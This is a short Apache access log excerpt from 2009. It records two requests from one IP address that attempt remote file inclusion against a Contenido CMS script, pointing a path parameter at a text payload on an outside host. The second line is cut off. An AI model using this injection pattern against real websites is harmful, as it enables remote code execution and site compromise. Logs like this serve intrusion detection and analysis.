218.38.243.71 - - [31/May/2009:10:05:05 -0400] "GET ///contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
218.38.243.71 - - [31/May/2009:10:05:07 -0400] "GET /logs///contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://210.110.